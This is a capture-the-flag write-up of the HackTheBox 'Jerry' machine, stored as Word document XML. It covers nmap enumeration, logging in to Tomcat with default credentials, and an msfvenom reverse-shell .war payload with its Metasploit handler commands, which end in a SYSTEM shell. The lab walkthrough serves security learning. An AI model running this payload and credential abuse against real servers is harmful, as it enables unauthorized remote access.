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4FD4E" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A"/>
    <w:p w14:paraId="55D67EC0" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>Starting off with nmap to determine what ports are open, what services are running on the ports and what are their versions, thus determining the target !</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C97314" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A"/>
    <w:p w14:paraId="6B508C3F" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>So there is only 1 port open, which is - 8080; http; Apache Tomcat - let's look at the web page and do some enumeration to find any vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C213FC1" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A"/>
    <w:p w14:paraId="7297941F" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>It looks like you this is the default apache tomcat page running version 7.0.88. There are also 3 other web pages; Server Status, Manager App, Host Manager. From experience I know that Host Manager will redirect me to Manager App once I log in successfully, so I will skip it. Let's see what we can find in Server Status page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1A4E44" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t xml:space="preserve">As I tried to access the page a login prompt popped up, as usual, but I was able to guess the default credentials (admin:admin). Once I accessed the page I was able to see what is the Hostname of the machine, OS name and version and system architecture. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58395AD9" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A"/>
    <w:p w14:paraId="2B5F1000" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t xml:space="preserve">I now know with which OS I have to deal. Now, went back to index.html, and tried to login to Manager App. And here I found something interesting. The developer left the default credentials, and tomcat was nice enough to show the default error screen, when I tried to login with wrong username and password. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F58951" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A"/>
    <w:p w14:paraId="7EA1E6E7" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>I grabbed the credentials from the error page and tried to login to the Manager App, and... Success !</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24241D23" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A"/>
    <w:p w14:paraId="187E8CE0" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>As I'm now logged in as admin, Tomcat has a feature to upload .war files, which I am able to exploit by using msfvenom to generate a reverse shell with .war extension. War files are also like zip files, they store other files inside it, and by this it means that once I upload a war file to tomcat and try to access it, instead of getting the reverse shell immediately, I will have to specify the actual .jsp file inside the war file. And I can do this by simply unzipping the war file to see the actual payload file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EF39F4" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A"/>
    <w:p w14:paraId="798F118A" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>#MSFVenom command to generate .war malicious file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0DB6A" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=&lt;IP&gt; LPORT=4444 -f war -o ev1l.war</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360E23C9" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>I opened Metasploit and set the handler I need to use, after that i set the payload and the options to be able to get a connection back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577FAB4A" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>#In Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DB0FF2" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>$ use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FF9D7F" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>$ set payload windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E49B7CD" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>$ set LHOST &lt;LocalIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1D02D2" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>$ set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0219D7" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>$ exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A627FF" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>Once I uploaded the file I unzipped it on my box, checked the jsp file name and accessed it in the web browser to trigger the payload and get reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455921C6" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A"/>
    <w:p w14:paraId="0771955B" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A"/>
    <w:p w14:paraId="2B7B712B" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A"/>
    <w:p w14:paraId="39B13F6F" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t xml:space="preserve">As I now have a meterpreter reverse shell in metasploit I can check now what user I have access to. And it turns out that I was logged in as NT AUTHORITY\SYSTEM. Game Over ! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB63BB" w14:textId="77777777" w:rsidR="004E2C2A" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A"/>
    <w:p w14:paraId="1B57AD13" w14:textId="7E8DF80A" w:rsidR="00B857B5" w:rsidRDefault="004E2C2A" w:rsidP="004E2C2A">
      <w:r>
        <w:t>That's how you do Jerry from HackTheBox !</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00B8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BF"/>
    <w:rsid w:val="004E2C2A"/>
    <w:rsid w:val="009707BF"/>
    <w:rsid w:val="00B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80065-F1F6-4F0F-81CC-2495F99C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824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23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916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72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96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33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2363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24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Karabadzhakov</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Konstantin Karabadzhakov</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-16T17:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-16T17:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>